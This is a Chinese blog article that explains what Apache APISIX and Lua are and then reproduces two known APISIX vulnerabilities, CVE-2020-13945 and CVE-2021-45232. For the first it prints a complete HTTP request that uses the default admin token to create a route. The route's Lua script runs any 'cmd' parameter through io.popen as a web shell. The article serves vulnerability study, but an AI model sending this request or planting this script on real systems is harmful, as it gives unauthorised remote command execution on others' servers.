当前位置：首页 > article >正文

Apache APISIX

article 2025/8/22 4:09:06

Apache APISIX是什么？

Lua

Lua 的主要特点：

Lua 的常见应用：

CVE-2020-13945(Apache APISIX默认API Token导致远程Lua代码执行)

编辑Lua脚本解析

CVE-2021-45232(Apache APISIX Dashboard API权限绕过导致RCE)

Apache APISIX是什么？

Apache APISIX是一个高性能、云原生的API网关，它基于Nginx和Lua,用于处理和管理大规模的API请求。它是开源的，并且主要用于微服务架构中的流量管理、负载均衡、认证、访问控制、日志、监控等功能。

主要特点：

高性能：基于 Nginx 的高性能特性，APISIX 能够处理大量并发请求。
插件架构：提供丰富的插件系统，可以根据需求对流量进行控制（如身份验证、IP 限制、请求转发等）。
动态路由：支持动态路由配置，可以根据请求的不同特点（如路径、方法、头信息等）进行流量路由。
负载均衡：支持多种负载均衡算法，如轮询、加权轮询、最少连接等。
支持多种协议：不仅支持 HTTP/HTTPS，也支持 WebSocket、gRPC 等协议。
可扩展性：支持插件的动态加载和自定义插件开发，灵活扩展功能。
云原生支持：与 Kubernetes 和 Docker 等云原生平台紧密集成，适合微服务架构。

典型用途：

API 管理：可以作为 API 网关，处理 API 的访问请求，提供认证、限流、日志记录等功能。
微服务架构：在微服务架构中作为流量入口，统一管理和路由请求到不同的微服务。
负载均衡和流量控制：通过配置负载均衡算法，平衡服务的流量和性能。

Lua

Lua 是一种轻量级、高效的脚本编程语言，它的设计目标是嵌入式开发，特别适合用作扩展语言。Lua 的语法简洁，执行效率高，且容易嵌入到其他应用中，常用于游戏开发、Web 应用、嵌入式系统等领域。

Lua 的主要特点：

轻量级和高效：Lua 的内存占用小，启动速度快，适合在资源受限的环境下使用。它的执行效率很高，通常在嵌入式系统中作为脚本语言来进行扩展。
简洁的语法：Lua 的语法非常简洁，易学易用。它的设计者遵循了“少即是多”的原则，语言本身没有太多复杂的概念和关键字。
嵌入式脚本：Lua 设计的一个重要目的就是作为嵌入式脚本语言，能够轻松集成到其他应用程序中。通过 C API，Lua 可以方便地和 C 语言编写的应用进行交互，因此在游戏、网络服务等领域有着广泛的应用。
动态类型和自动垃圾回收：Lua 是一种动态类型语言，不需要显式地声明变量类型，同时也支持自动垃圾回收（即内存管理自动进行）。
扩展性：Lua 本身提供了非常简洁的 API，允许开发者方便地通过 C 语言与外部系统进行交互和扩展。

Lua 的常见应用：

游戏开发：Lua 经常作为游戏引擎的脚本语言，像 World of Warcraft 和 Angry Birds 就是使用 Lua 来进行游戏逻辑的编写。
Web 开发：Lua 在 Web 应用中也有应用，特别是与 Nginx 配合使用时，利用 OpenResty 平台提供高效的 Web 服务。
嵌入式系统：Lua 可以嵌入到嵌入式系统中，控制硬件设备或进行系统配置。
网络服务和 API 网关：像 Nginx 这样使用 Lua 扩展的应用，可以通过 Lua 脚本进行定制化的功能扩展，如动态路由、流量控制、缓存等。

Nginx 与 Lua 的结合：

Nginx 本身是一个高效的 Web 服务器和反向代理服务器，但它的配置文件主要用于静态配置，处理不了很多动态的逻辑。而 Lua 可以通过 OpenResty 或 Nginx 的 Lua 模块 来为 Nginx 增加动态的脚本支持，使其能够进行复杂的请求处理、数据处理等操作。例如，你可以使用 Lua 来编写自定义的路由逻辑、用户认证、请求转发等。

CVE-2020-13945(Apache APISIX默认API Token导致远程Lua代码执行)

漏洞成因：在用户未指定管理员Token或使用了默认配置文件的情况下，Apache APISIX将使用默认的管理员Token---edd1c9f034335f136f87ad84b625c8f1,可利用这个Token可以访问到管理员接口，进而通过script参数来插入任意Lua脚本执行。

版本要求：任意版本，截止本文章发布日期。

步骤1:使用默认Token访问管理员API接口来插入Lua脚本

POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406{"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M","upstream": {"type": "roundrobin","nodes": {"example.com:80": 1}}
}

Lua脚本解析

定义模块 _M：_M 是一个 Lua 模块，定义了一个函数 access，该函数将在每次访问时执行。
access 函数的功能：
- 它首先通过 ngx.req.get_uri_args() 获取 URL 参数中的所有查询参数。
- 然后，它从查询参数中提取 cmd 参数的值，并用 io.popen() 执行这个命令。io.popen() 会在操作系统中打开一个进程，执行提供的命令，并且返回该命令的输出。
- 接着，它读取并将命令的输出作为字符串通过 ngx.say(s) 输出到响应中。
- 最后，关闭执行命令的进程。
upstream 配置：这部分配置了一个上游服务器，它使用 roundrobin 负载均衡策略，将请求分发到 example.com:80 上。

步骤2:通过控制脚本里的参数值达到任意命令执行效果

CVE-2021-45232(Apache APISIX Dashboard API权限绕过导致RCE)

APISIX Dashboard是Apache APISIX的web管理界面工具。

漏洞成因：APISIX Dashboard 2.10.1版本前存在两个API接口/apisix/admin/migrate/export和/apisix/admin/migrate/import,这两个接口没有进过droplet框架的权限验证，导致未授权访问的攻击可以导出导入当前网关的所有配置项，包括路由、服务、脚本等。攻击者通过导入恶意路由，可以用来让APISIX 访问任意网站，或者是执行Lua脚本。

版本要求：APISIX Dashboard < 2.10.1

步骤1：利用接口的未授权访问导入恶意的配置文件，这里使用自带的脚本。

步骤2：发送数据包验证是否执行

Apache APISIX

Apache APISIX是什么？

Lua

Lua 的主要特点：

Lua 的常见应用：

CVE-2020-13945(Apache APISIX默认API Token导致远程Lua代码执行)

Lua脚本解析

CVE-2021-45232(Apache APISIX Dashboard API权限绕过导致RCE)

相关文章：

Apache APISIX

如何在 git dev 中创建合并请求

基于nlohmann/json 实现从C++对象转换成JSON数据格式

Java枚举类映射MySQL的深度解析与实践指南

代码训练LeetCode(21)跳跃游戏2

【HarmonyOS 5】鸿蒙APP使用【团结引擎Unity】开发的案例教程

《T/CI 404-2024 医疗大数据智能采集及管理技术规范》全面解读与实施分析

国产三维CAD皇冠CAD在「金属压力容器制造」建模教程：蒸汽锅炉

Mysql避免索引失效

python爬虫：Ruia的详细使用（一个基于asyncio和aiohttp的异步爬虫框架）

C++中单例模式详解

舆情监控系统爬虫技术解析

Windows上用FFmpeg采集摄像头推流 → MediaMTX服务器转发流 → WSL2上拉流播放

cpp多线程学习

Vue3中Ant-design-vue的使用-附完整代码

k8s热更新-subPath 不支持热更新

Redis Sorted Set 深度解析：从原理到实战应用

docker中组合这几个命令来排查 import 模块失败的问题

若依框架修改模板，添加通过excel导入数据功能

web全栈开发学习-01html基础

基于Socketserver+ThreadPoolExecutor+Thread构造的TCP网络实时通信程序

[Java 基础]枚举

多线程环境中，如果多个线程同时尝试向同一个TCP客户端发送数据，添加同步机制

【含文档+PPT+源码】基于微信小程序的旅游论坛系统的设计与实现

贝叶斯优化+LSTM+时序预测=Nature子刊！

NodeJS全栈WEB3面试题——P3Web3.js / Ethers.js 使用

Quick UI 组件加载到 Axure

Vue3（ref与reactive）

Starrocks中RoaringBitmap杂谈

通过ca证书的方式设置允许远程访问Docker服务